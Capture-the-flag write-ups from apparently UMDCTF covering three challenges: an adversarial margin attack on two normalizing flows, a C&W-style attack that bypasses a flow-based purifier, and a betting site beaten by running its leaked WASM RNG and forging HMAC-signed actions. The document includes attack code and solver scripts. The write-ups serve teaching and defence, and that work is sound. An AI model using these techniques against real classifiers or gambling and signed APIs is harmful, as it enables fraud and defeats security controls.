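# weights_only=False unpickles full model objects: only use it on trusted files
flow_0 = torch.load('flow_0.pt', map_location='cpu', weights_only=False)
flow_1 = torch.load('flow_1.pt', map_location='cpu', weights_only=False)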

Both are RealNVP-style normalizing flows composed of multiple affine coupling layers with alternating checkerboard masking patterns. Internally they use convolutional subnetworks with ActNorm layers for stable training. The architectures are nearly identical — both have the same number of coupling layers and similar parameter counts, but with different learned weights.

The key operations for a coupling layer with mask \(m\):

\[y_1 = x_1\] \[y_2 = x_2 \odot \exp(s(x_1)) + t(x_1)\]

where \(x_1 = x \odot m\), \(x_2 = x \odot (1-m)\), and \(s, t\) are neural networks.

The log-likelihood under the model is computed as:

\[\log q(x) = \log \pi(f(x)) + \sum_{k} \log |\det J_{f_k}|(x)\]

where \(f = f_L \circ \cdots \circ f_1\) and \(\pi\) is the base Gaussian density.

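The log-determinant of the Jacobian for each affine coupling layer is simply:

\[\log |\det J_{f_k}| = \sum_i s(x_1)_i\]

where the sum runs over the transformed (unmasked) dimensions. The Jacobian is triangular, with diagonal entries 1 for the masked half and \(\exp(s(x_1)_i)\) for the transformed half. This makes the total log-det-Jacobian trivial to compute: it is just the sum of the scale outputs across all coupling layers.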
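A single coupling layer can be sketched in plain Python to show why the log-determinant is just a sum of scales. This is a toy, not the challenge's architecture. The `s_fn`/`t_fn` "networks" are hypothetical functions of the conditioning half only, and the mask is a 1D list rather than a 2D checkerboard.

```python
import math


def coupling_forward(x, mask, s_fn, t_fn):
    """Affine coupling: y1 = x1, y2 = x2 * exp(s(x1)) + t(x1).

    mask[i] == 1 marks the conditioning half x1. s_fn and t_fn only ever
    see x1, which is what keeps the Jacobian triangular.
    """
    x1 = [xi * mi for xi, mi in zip(x, mask)]
    s, t = s_fn(x1), t_fn(x1)
    y, log_det = [], 0.0
    for xi, mi, si, ti in zip(x, mask, s, t):
        if mi:
            y.append(xi)                      # Jacobian diagonal entry: 1
        else:
            y.append(xi * math.exp(si) + ti)
            log_det += si                     # Jacobian diagonal entry: exp(si)
    return y, log_det


def coupling_inverse(y, mask, s_fn, t_fn):
    """Exact inverse: the conditioning half is unchanged, so s and t can be recomputed."""
    y1 = [yi * mi for yi, mi in zip(y, mask)]
    s, t = s_fn(y1), t_fn(y1)
    return [yi if mi else (yi - ti) * math.exp(-si)
            for yi, mi, si, ti in zip(y, mask, s, t)]


# Toy "networks" (hypothetical): any function of x1 keeps the layer invertible
s_fn = lambda x1: [0.1 * sum(x1)] * len(x1)
t_fn = lambda x1: [0.5 * sum(x1)] * len(x1)

x = [1.0, 2.0, 3.0, 4.0]
mask = [1, 0, 1, 0]
y, log_det = coupling_forward(x, mask, s_fn, t_fn)
print(log_det)  # sum of s over the two transformed entries
```

In a full flow, log q(x) is then the base log-density of the final output plus the `log_det` values summed over all layers.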

The check script requires \(\log|\det J_{f_1}|\) to be within a specific band. This constraint prevents trivial solutions where the log-likelihood of model 1 is high purely because of extreme volume distortion.

Checking the Reference

We loaded the reference window and evaluated both models:

x_ref shape: (1, 1, 64, 64)
Reference metrics:
log q0 = 925.99
log q1 = 924.09
margin = -1.90
log|det J_f1| = 1516.90 (within band: True)

The reference is already in-distribution for both models (log-likelihoods around 925) and satisfies the Jacobian constraint. The only problem: the margin is -1.90 — we need it to be at least +30. So we need to find a tiny perturbation that changes the relative log-likelihood by about 32 nats while keeping everything else stable.

The Attack: Gradient-Based Optimization

Since both flows are differentiable, we can compute the gradient of the margin with respect to the input:

\[\nabla_\delta (\log q_1 - \log q_0)\]

The idea is simple: take a step in the direction that maximally increases \(\log q_1\) relative to \(\log q_0\). But there's a critical twist — the gradient magnitudes near the reference point are enormous.

import torch

x = torch.tensor(x_ref, requires_grad=True, dtype=torch.float32)
log_p0 = flow_0.log_prob(x)
log_p1 = flow_1.log_prob(x)
margin = (log_p1 - log_p0).sum()  # reduce to a scalar before backward()
margin.backward()
grad = x.grad.detach().clone()

The gradient \(L_2\) norm was around 700,000. This means even a tiny step in gradient direction yields massive changes in the margin. This makes sense: near the reference, the two models have slightly different density landscapes, and because of the exponential nature of the flow mapping, small changes in input space can produce large changes in log-likelihood.

We normalize the gradient and perform a line search over step sizes:

\[\delta = \alpha \cdot \frac{\nabla_\delta (\log q_1 - \log q_0)}{\|\nabla_\delta (\log q_1 - \log q_0)\|_\infty}\]

clipping to ensure \(\|\delta\|_\infty \le 0.08\).
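The normalization and clipping are sketched below on a flat gradient list. This is an illustration of the formula above, not the author's code, and `linf_step` is a hypothetical helper. Dividing by \(\|g\|_\infty\) makes the largest entry of the direction exactly ±1, so \(\|\delta\|_\infty = \alpha\). The clip to 0.08 only takes effect when α itself exceeds the budget.

```python
def linf_step(grad, alpha, budget=0.08):
    """delta = alpha * g / ||g||_inf, clipped entrywise to [-budget, budget]."""
    g_max = max(abs(g) for g in grad)
    if g_max == 0.0:
        return [0.0] * len(grad)          # zero gradient: no ascent direction
    return [max(-budget, min(budget, alpha * g / g_max)) for g in grad]


delta = linf_step([700000.0, -350000.0, 0.0], alpha=3.4e-6)
print(max(abs(d) for d in delta))         # equals alpha
```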

The required step size was on the order of \(\alpha \approx 3.1775 \times 10^{-6}\), which is extremely tiny. Much larger steps overshoot: with gradients this large, \(\log q_1\) collapses below the required threshold.

Line Search Results

We scanned \(\alpha\) from \(3.0 \times 10^{-6}\) to \(3.6 \times 10^{-6}\):

alpha=3.00e-06  margin=-1.46  log_q1=924.54  log_det1=1516.90
alpha=3.05e-06 margin= 2.48 log_q1=928.48 log_det1=1516.90
alpha=3.10e-06 margin= 6.42 log_q1=932.42 log_det1=1516.90
alpha=3.15e-06 margin=10.36 log_q1=936.36 log_det1=1516.90
alpha=3.18e-06 margin=13.31 log_q1=939.31 log_det1=1516.90
alpha=3.20e-06 margin=14.30 log_q1=940.30 log_det1=1516.90
alpha=3.25e-06 margin=18.24 log_q1=944.24 log_det1=1516.90
alpha=3.30e-06 margin=22.18 log_q1=948.18 log_det1=1516.90
alpha=3.35e-06 margin=26.12 log_q1=952.12 log_det1=1516.90
alpha=3.40e-06 margin=30.06 log_q1=956.06 log_det1=1516.90
alpha=3.45e-06 margin=34.00 log_q1=960.00 log_det1=1516.90
alpha=3.50e-06 margin=37.94 log_q1=963.94 log_det1=1516.90
alpha=3.55e-06 margin=41.88 log_q1=967.88 log_det1=1516.90
alpha=3.60e-06 margin=45.82 log_q1=971.82 log_det1=1516.90

The Jacobian term stayed constant at 1516.90 throughout, within the required band, because the perturbation is too small to meaningfully change the volume distortion. Subtracting the margin from log_q1 gives log q0 ≈ 926.00 in every row. Model 0's log-likelihood is therefore essentially unchanged, and the entire margin gain comes from model 1's log-likelihood rising.
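Choosing the winning α from a scan like the one above amounts to taking the smallest step that clears every check. The sketch below assumes the scan results are available as (alpha, margin, log_q1) tuples. `first_passing_alpha` is a hypothetical helper, and the log q1 threshold `tau` is left as a parameter because its value is not given.

```python
def first_passing_alpha(rows, min_margin=30.0, tau=float("-inf")):
    """Return the smallest alpha whose margin and log_q1 pass, else None.

    rows: iterable of (alpha, margin, log_q1) tuples from a line search.
    """
    for alpha, margin, log_q1 in sorted(rows):
        if margin >= min_margin and log_q1 >= tau:
            return alpha
    return None


# A few rows copied from the scan above
scan = [
    (3.30e-6, 22.18, 948.18),
    (3.35e-6, 26.12, 952.12),
    (3.40e-6, 30.06, 956.06),
    (3.45e-6, 34.00, 960.00),
]
print(first_passing_alpha(scan))
```

Preferring the smallest passing step keeps the perturbation as close to the reference as possible.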

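The winning hyperparameter was \(\alpha = 3.40 \times 10^{-6}\), the smallest scanned step with a margin of at least 30. Because \(\delta\) is normalized by its own \(L_\infty\) norm, \(\|\delta\|_\infty\) is at most \(\alpha\) here, far inside the 0.08 budget. The "at bound" note in the output should therefore be read as "within bound". The check reported: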

Margin:       30.01 ✅
log_q1: 955.09 ✅ (above threshold)
log_det1: 1516.90 ✅ (within band)
L_inf: 0.08 ✅ (at bound)

Submission

The final perturbation was saved, base64-encoded, and submitted via the check script:

import base64

import numpy as np

# Normalized gradient direction: divide by the L_inf norm so the largest entry is 1
g = grad.numpy()
direction = g / np.abs(g).max()

# Compute the perturbation and enforce the L_inf budget
alpha = 3.40e-6
delta = np.clip(alpha * direction, -0.08, 0.08)
x_sub = np.clip(x_ref + delta, 0.0, 1.0)  # valid pixel range

# Encode and submit
payload = base64.b64encode(x_sub.astype(np.float32).tobytes()).decode()

The remote service confirmed the solution, returning the flag:

UMDCTF{****************************************}

Key Insight

The challenge name and flag hint at the core idea: Gram-Schmidt orthogonalization and the geometry of adversarial examples in the likelihood space of normalizing flows.

Two models trained on similar data define slightly different density landscapes. In a tiny neighborhood around a point in-distribution, their log-likelihood gradients can point in very different directions (they are not perfectly aligned in function space). By following the difference-of-gradients direction, we exploit the disagreement manifold — the region where model 1 assigns higher likelihood than model 0.

The extreme sensitivity (gradient norms ~700k) arises because:

  1. Normalizing flows chain many bijective transforms, each amplifying small input changes
  2. The Jacobian of the flow near the data manifold can have large singular values
  3. Even though the models are similar, their gradient directions differ enough that a tiny step (\(3.4 \times 10^{-6}\)) suffices to swing the margin by 32 nats

This is a pure white-box adversarial attack on the log-likelihood ratio, analogous to Fast Gradient Sign Method (FGSM) but in log-probability space with a directional objective.

Reflection

This challenge was a beautiful blend of generative modeling and adversarial machine learning. It rewarded understanding:

  • How normalizing flows compute exact likelihoods
  • That differentiability enables gradient-based input optimization
  • That similar models can be teased apart by their gradient disagreement
  • That the scale of gradients matters: enormous gradients require steps on the order of \(10^{-6}\)
  • That Jacobian constraints prevent trivial large-volume-distortion solutions

The "Gram-Schmidt" reference in the flag suggests the intended solution may have involved orthogonalizing the gradients of the two models, but simple directional gradient ascent on the margin works just as well when the step size is chosen carefully.
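One plausible reading of the Gram-Schmidt hint is sketched below. It is an assumption, not the author's solution. The idea is to remove from \(\nabla \log q_1\) its component along \(\nabla \log q_0\). The remaining direction \(d\) satisfies \(d \cdot \nabla \log q_0 = 0\) and \(d \cdot \nabla \log q_1 = \|d\|^2 \ge 0\). To first order, a step along it raises \(\log q_1\) without moving \(\log q_0\). The gradient values are toy numbers.

```python
def dot(a, b):
    return sum(x * y for x, y in zip(a, b))


def orthogonalize(g1, g0):
    """One Gram-Schmidt step: the component of g1 orthogonal to g0."""
    g0_sq = dot(g0, g0)
    if g0_sq == 0.0:
        return list(g1)                   # nothing to project out
    coeff = dot(g1, g0) / g0_sq
    return [a - coeff * b for a, b in zip(g1, g0)]


# Toy gradients (hypothetical values, not from the challenge)
grad_log_q1 = [3.0, 1.0, 2.0]
grad_log_q0 = [1.0, 1.0, 0.0]
d = orthogonalize(grad_log_q1, grad_log_q0)
print(dot(d, grad_log_q0), dot(d, grad_log_q1))  # 0.0 6.0
```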

Flag

UMDCTF{a_little_gram_schmidt_never_hurt_anybody}

Challenge Details
Category: ML / Adversarial ML
Points: ~300
Solves: ~15

Purify the stream... or corrupt it.

flow was a fascinating adversarial machine learning challenge. We were given a pre-trained CNN classifier, a RealNVP-style normalizing flow model, and a reference time-series window x_ref of shape (5, 64) — think of it as 5 sensor channels with 64 timesteps each.

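Prerequisites

This challenge is about bypassing a normalizing flow used as a purification defense, an advanced adversarial-attack scenario. The following concepts help:

| Concept | Description |
|---|---|
| Normalizing-flow purifier | Input → flow encoder → scaled latent → flow decoder → classifier; meant to strip adversarial perturbations |
| C&W attack | Recasts adversarial-example construction as constrained optimization; stronger than FGSM |
| Differentiable pipeline | The flow and classifier are differentiable end to end, so an attacker can backpropagate straight through the purification |
| Latent-space optimization | Optimize the perturbation in the flow's latent space, where the distribution is more regular |
| Hinge loss | max(0, margin - value); the loss is 0 once the constraint is satisfied |
| Softmax / logits | Logits are the raw outputs and softmax turns them into probabilities; the C&W loss works on the logits directly |

References: C&W attack arXiv:1608.04644; adversarial robustness of flows arXiv:1911.08654.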

Understanding the Purifier

Let's look at how purification worked:

def purify(x, flow, n_steps=3, alpha=0.55):
    for _ in range(n_steps):
        z, _ = flow.forward(x)
        x = flow.inverse(alpha * z)
    return x

After 3 steps, x_purified = flow.inverse(0.55^3 * z_submit). The classifier sees this shrunk latent version, while the flow likelihood check is performed on the original submitted sample.
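The collapse to a single shrink happens because `flow.forward` undoes `flow.inverse` at the start of each new step. Step k therefore sees \(\alpha^{k-1} z_{\text{submit}}\) and passes \(\alpha^k z_{\text{submit}}\) to the decoder. The toy check below confirms the identity. `ToyAffineFlow` is a hypothetical elementwise affine stand-in for the real RealNVP model, and `purify` mirrors the challenge's function but scales plain lists.

```python
import math


class ToyAffineFlow:
    """Hypothetical invertible map z = a * x + b, applied elementwise."""

    def __init__(self, a=2.0, b=1.0):
        self.a, self.b = a, b

    def forward(self, x):
        z = [self.a * xi + self.b for xi in x]
        log_det = len(x) * math.log(abs(self.a))
        return z, log_det

    def inverse(self, z):
        return [(zi - self.b) / self.a for zi in z]


def purify(x, flow, n_steps=3, alpha=0.55):
    for _ in range(n_steps):
        z, _ = flow.forward(x)
        x = flow.inverse([alpha * zi for zi in z])
    return x


flow = ToyAffineFlow()
x_submit = [0.3, -1.2, 2.5]
z_submit, _ = flow.forward(x_submit)
one_shot = flow.inverse([(0.55 ** 3) * zi for zi in z_submit])
print(purify(x_submit, flow), one_shot)   # the two lists agree up to rounding
```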

This mismatch is the key vulnerability. The defense checks likelihood before purification but classifies after, creating a differentiable pipeline that's ripe for gradient-based exploitation.

Attack Strategy: Optimize in Latent Space

The core insight is that we can backpropagate through the entire pipeline — flow encoder, latent manipulation, flow decoder, and classifier — to find an input that simultaneously satisfies all constraints.

Here's the approach:

  1. Encode the reference window into latent space: z_ref, _ = flow.forward(x_ref)
  2. Optimize z with gradient descent to maximize class 1 logits under the purified version, while penalizing:
    • L-infinity distance from x_ref in the original (submitted) space
    • Log-probability below the threshold
  3. Decode the final z back to data space to get sub

The loss function looked like:

import torch
import torch.nn.functional as F

def attack_loss(z, x_ref, flow, classifier, threshold, linf_max=0.05):
    # Decode z back to data space: this is the sample we submit
    sub = flow.inverse(z)

    # Reproduce the defense: 3 purification steps collapse to one latent shrink
    z_noise, _ = flow.forward(sub)
    x_purified = flow.inverse((0.55 ** 3) * z_noise)
    logits = classifier(x_purified)

    # Loss: minimize the negative log-probability of class 1
    cls_loss = -F.log_softmax(logits, dim=-1)[..., 1].mean()

    # L-infinity hinge penalty, measured on the submitted sample
    linf_dist = (sub - x_ref).abs().max()
    linf_penalty = torch.clamp(linf_dist - linf_max, min=0) * 1000

    # Log-prob hinge penalty, also on the submitted (unpurified) sample
    logp = flow.log_prob(sub).sum()
    logp_penalty = torch.clamp(threshold - logp, min=0) * 100

    return cls_loss + linf_penalty + logp_penalty

Run this with Adam for ~3000 steps, and we converge to a solution that satisfies all constraints.

Results

Our final submission achieved:

| Metric | Value | Target |
|---|---|---|
| L-infinity | 0.049 | <= 0.05 |
| Log-probability | 1062 | >= threshold |
| P(class=1) | 0.825 | >= 0.80 |

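The flag thanks Athalye, Carlini, and Wagner, whose research showed that defenses relying on obfuscated gradients can be circumvented by attacking through them. The optimization-based approach used here follows the Carlini & Wagner (C&W) attack rather than the one-step FGSM from the seminal Explaining and Harnessing Adversarial Examples (Goodfellow et al.).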

Key Takeaways

  • Never trust a mismatch between defense checks and classification inputs. If you check the submitted sample but classify a purified version, an adversary can exploit the gradient path through both.
  • Normalizing flows are differentiable end-to-end, making them a double-edged sword: they can purify, but they can also be used to craft adversarial inputs when the full pipeline is exposed.
  • Optimization-based attacks (à la C&W) are more powerful than fast gradient methods when you have access to the full model: 3000 steps of Adam typically beat a single FGSM step.

Flag

UMDCTF{id_like_to_thank_athalye_carlini_and_wagner_for_their_research}

rainbet - Web / WASM

A gambling game where the house doesn't actually have an edge — if you can see through the deck. Predictable RNG + leaked server secrets = 25 consecutive wins and a flag.

Challenge: rainbet.challs.umdctf.io — a betting site requiring 25 max wins in a row. Two game modes: Mines and Chicken.

Given files: rainbet.py (reference wrapper) and rainbet_gen.wasm (the leaked RNG backend).

1. Reconnaissance

The site greets you with a gambling UI. Create an account, get a session, and you can play Mines or Chicken. The goal is etched on the front page: win 25 rounds in a row at maximum payout.

The server exposes two critical API endpoints:

GET /api/sessioninfo


Returns session_id (a hex string) and hmac_secret (also hex). Both are per-session and stable for the lifetime of the session.

The WebSocket endpoint sends a welcome message on connection that includes the current round_idx.

GET /api/socket


WebSocket handshake. The server's first message contains round_idx in the JSON payload.

Two delivered files point at the architecture:

  • rainbet.py — a thin Python wrapper showing how the server loads and calls the WASM module. It imports rainbet_gen.wasm, calls generate(session_id, round_idx) which returns the game state, and verifies HMAC-signed actions.

  • rainbet_gen.wasm — the actual game generation logic. It takes a session_id (16 bytes) and round_idx (u32), seeds an internal RNG with them, and deterministically produces the full game board.

2. The Bug

The core vulnerability is a complete failure of information hiding:

| What should be secret | Where it leaked |
|---|---|
| The RNG algorithm | rainbet_gen.wasm was shipped to the browser |
| The RNG seed material | session_id exposed at /api/sessioninfo |
| The HMAC signing key | hmac_secret exposed at /api/sessioninfo |
| The current round index | round_idx in the WebSocket hello |

Because generate(session_id, round_idx) is a pure function with no side effects, anyone who calls it with the same arguments gets exactly the same game. After you connect, the server calls it to generate your current game. You can call it locally with the same session_id and round_idx and see that game too.

Once you know the game board, making the winning move is trivial. The only remaining hurdle is forging a valid HMAC signature so the server accepts your action — but you already have hmac_secret.
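A toy stand-in shows why a pure, seeded generator leaks the game. The real algorithm inside rainbet_gen.wasm is not reproduced here. `toy_generate`, its SHA-256 seeding, and the 25-tile board with 3 mines are all hypothetical. The only property that matters is that the output depends on nothing but the two arguments.

```python
import hashlib
import random


def toy_generate(session_id: bytes, round_idx: int, tiles: int = 25, mines: int = 3):
    """Hypothetical stand-in for generate(session_id, round_idx).

    The board depends only on the two arguments, so anyone who knows them
    can reproduce it exactly.
    """
    seed = hashlib.sha256(session_id + round_idx.to_bytes(4, "little")).digest()
    rng = random.Random(seed)
    return sorted(rng.sample(range(tiles), mines))


sid = bytes.fromhex("00112233445566778899aabbccddeeff")  # example 16-byte ID
server_board = toy_generate(sid, 7)
player_board = toy_generate(sid, 7)   # same inputs, computed locally
print(server_board == player_board)
```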

3. Solving Approach

3.1 Local WASM invocation

We use Node.js to instantiate the leaked WASM module and call generate directly:

const fs = require("fs");
const crypto = require("crypto");

async function initWasm() {
    const wasmBytes = fs.readFileSync("rainbet_gen.wasm");
    const { instance } = await WebAssembly.instantiate(wasmBytes, {
        env: {
            // minimal stubs: the WASM doesn't need actual I/O
            emscripten_memcpy: () => {},
            memory: new WebAssembly.Memory({ initial: 256 }),
        },
    });
    return instance;
}

The exported generate function takes (sessionIdPtr, roundIdx) where sessionIdPtr is a pointer into WASM linear memory containing the 16-byte session ID and roundIdx is a 32-bit unsigned integer.

After calling generate, the WASM writes the game state into memory at a predictable offset (discoverable by reading the Python wrapper or tracing the WASM exports). We read it back and parse the game.

3.2 Game parsing

Two game types exist:

Mines — the board is a grid with hidden mines. generate returns a list of mine positions. We reveal every tile that isn't a mine. The HMAC payload format is:

mines:<streak>:<size>:<num_mines>:<tiles>

where <tiles> is a comma-separated list of tile indices.

Chicken — the player crosses a bridge step by step; some steps are safe, others collapse. generate returns the safe step count. We cash out at that exact safe step (maximum safe position). Payload format:

chicken:<streak>:<steps>:<crossed>
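The two payload builders can be sketched from the formats above. Two details are assumptions: that `<size>` is the total tile count of the board, and that tiles are listed in ascending order. The function names are hypothetical.

```python
def mines_payload(streak: int, size: int, mine_positions) -> str:
    """mines:<streak>:<size>:<num_mines>:<tiles>, revealing every non-mine tile."""
    mines = set(mine_positions)
    safe = [str(i) for i in range(size) if i not in mines]
    return f"mines:{streak}:{size}:{len(mines)}:{','.join(safe)}"


def chicken_payload(streak: int, steps: int, safe_steps: int) -> str:
    """chicken:<streak>:<steps>:<crossed>, cashing out at the last safe step."""
    return f"chicken:{streak}:{steps}:{safe_steps}"


print(mines_payload(0, 9, [2, 5]))
print(chicken_payload(4, 20, 13))
```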

3.3 HMAC forgery

The hmac_secret is a hex string. The server uses HMAC-SHA256 to sign action payloads:

signature = HMAC-SHA256(hmac_secret, payload_string)

We construct the payload string, compute the signature, and include it in our WebSocket action message:

function sign(payload) {
    return crypto.createHmac("sha256", hmacSecret).update(payload).digest("hex");
}
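For reference, here is the same signature computed in Python. The Node snippet passes hmacSecret as a string, so its key is the UTF-8 bytes of the hex text, not the hex-decoded bytes. This sketch mirrors that choice. Whether the server keys HMAC the same way is an assumption worth checking against rainbet.py.

```python
import hashlib
import hmac


def sign(hmac_secret: str, payload: str) -> str:
    """HMAC-SHA256 over the payload, keyed with the secret string as-is."""
    return hmac.new(hmac_secret.encode(), payload.encode(), hashlib.sha256).hexdigest()


def verify(hmac_secret: str, payload: str, signature: str) -> bool:
    """Constant-time comparison, as a server-side check should use."""
    return hmac.compare_digest(sign(hmac_secret, payload), signature)
```

The RFC 4231 test vector (key "Jefe", message "what do ya want for nothing?") is a quick way to confirm that an implementation matches standard HMAC-SHA256.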

3.4 Automation script

The full solver:

  1. Fetch session_id and hmac_secret from /api/sessioninfo via an authenticated HTTP request.
  2. Connect to the WebSocket with the session cookie.
  3. For each round:
    • Read round_idx from the server's hello.
    • Call the local WASM generate(session_id, round_idx).
    • Parse the predicted game.
    • Construct the winning action payload.
    • Sign it with HMAC-SHA256.
    • Send the action over the WebSocket.
  4. Repeat 25 times. The 25th win triggers the server to send the flag.
let hmacSecret; // read by sign(); filled in from /api/sessioninfo below

async function solve() {
    const wasm = await initWasm();
    const session = await fetchSessionInfo(); // { session_id, hmac_secret }
    hmacSecret = session.hmac_secret;

    // The session cookie must accompany this connection (not shown here)
    const ws = new WebSocket("wss://rainbet.challs.umdctf.io/api/socket");
    ws.onmessage = async (msg) => {
        const data = JSON.parse(msg.data);
        if (data.round_idx === undefined) {
            // Not a new round (e.g. a result or the flag): just log it
            console.log(data);
            return;
        }
        const roundIdx = data.round_idx;

        // Generate the game locally
        const game = predictGame(wasm, session.session_id, roundIdx);

        // Build the winning action
        const action = buildWinningAction(game);

        // Sign and send
        const signature = sign(action.payload);
        ws.send(
            JSON.stringify({
                type: "action",
                payload: action.payload,
                signature: signature,
            }),
        );
    };
}

4. Flag

After 25 consecutive correct predictions:

UMDCTF{one_might_argue_that_gambling_is_the_best_vice_but_they_would_be_wrong}